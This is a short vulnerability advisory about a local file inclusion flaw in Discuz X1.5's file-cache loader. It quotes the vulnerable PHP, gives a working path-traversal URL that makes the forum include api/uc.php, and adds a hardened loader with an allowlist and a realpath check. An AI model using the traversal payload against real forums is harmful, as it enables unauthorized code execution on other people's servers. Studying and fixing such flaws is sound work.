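DISCUZ X1.5 Local File Inclusion Vulnerability
<p> Discuz X1.5 has a local file inclusion vulnerability. It is conditional: the site must be using files as its cache backend.</p><p> config_global.php</p>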
<p> $_config['cache']['type'] = 'file';</p>
<p> function cachedata($cachenames) {</p>
<p> // ...</p>
<p> $isfilecache = getglobal('config/cache/type') == 'file';</p>
<p> // ...</p>
<p> if($isfilecache) {</p>
<p> $lostcaches = array();</p>
<p> foreach($cachenames as $cachename) {</p>
<p> // $cachename is concatenated into the include path without validation</p>
<p> if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {</p>
<p> $lostcaches[] = $cachename;</p>
<p> }</p>
<p> }</p>
<p> // ...</p>
<p> }</p>
<p> URL:</p>
<p> http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc</p>
<p> Authracation has expiried</p>
<p> The code in api/uc.php was executed.</p>
<p> Author: Jannock</p>
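<p> Added example (not part of the original post and not Discuz's own fix): a hardened variant of the cache loader shown above, which rejects any cache name that could steer the include path out of data/cache. The function names safe_cache_path and load_caches, the 64-character limit, the cache name "forums" and the temporary demo tree are assumptions made for illustration.</p>

```php
<?php
// Added example: hypothetical hardened loader, not Discuz code.
// A cache name may hold only letters, digits and underscores, so it can
// never carry "/", "\" or ".." into the include path.
function safe_cache_path(string $root, string $cachename): ?string {
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $cachename)) {
        return null;
    }
    $cacheDir = realpath($root . '/data/cache');
    if ($cacheDir === false) {
        return null;
    }
    $path = realpath($cacheDir . '/cache_' . $cachename . '.php');
    // Defence in depth: the resolved file must sit directly in data/cache.
    if ($path === false || dirname($path) !== $cacheDir) {
        return null;
    }
    return $path;
}

// Same contract as the loop in cachedata(): returns the names not loaded.
function load_caches(string $root, array $cachenames): array {
    $lostcaches = [];
    foreach ($cachenames as $cachename) {
        $path = safe_cache_path($root, (string) $cachename);
        if ($path === null || !(include_once $path)) {
            $lostcaches[] = $cachename;
        }
    }
    return $lostcaches;
}

// Constructed demo tree: one real cache file and a stand-in for api/uc.php.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($root . '/data/cache', 0700, true);
mkdir($root . '/api', 0700, true);
file_put_contents($root . '/data/cache/cache_forums.php', '<?php $GLOBALS["demo_cache"] = 1;');
file_put_contents($root . '/api/uc.php', '<?php $GLOBALS["uc_ran"] = 1;');

$lost = load_caches($root, ['forums', 'ygjgj/../../../api/uc']);
echo 'rejected: ', json_encode($lost), PHP_EOL;
echo 'api/uc.php included: ', var_export(isset($GLOBALS['uc_ran']), true), PHP_EOL;
```

<p> The allowlist check alone stops the traversal; the realpath() comparison additionally catches symlinks placed inside the cache directory.</p>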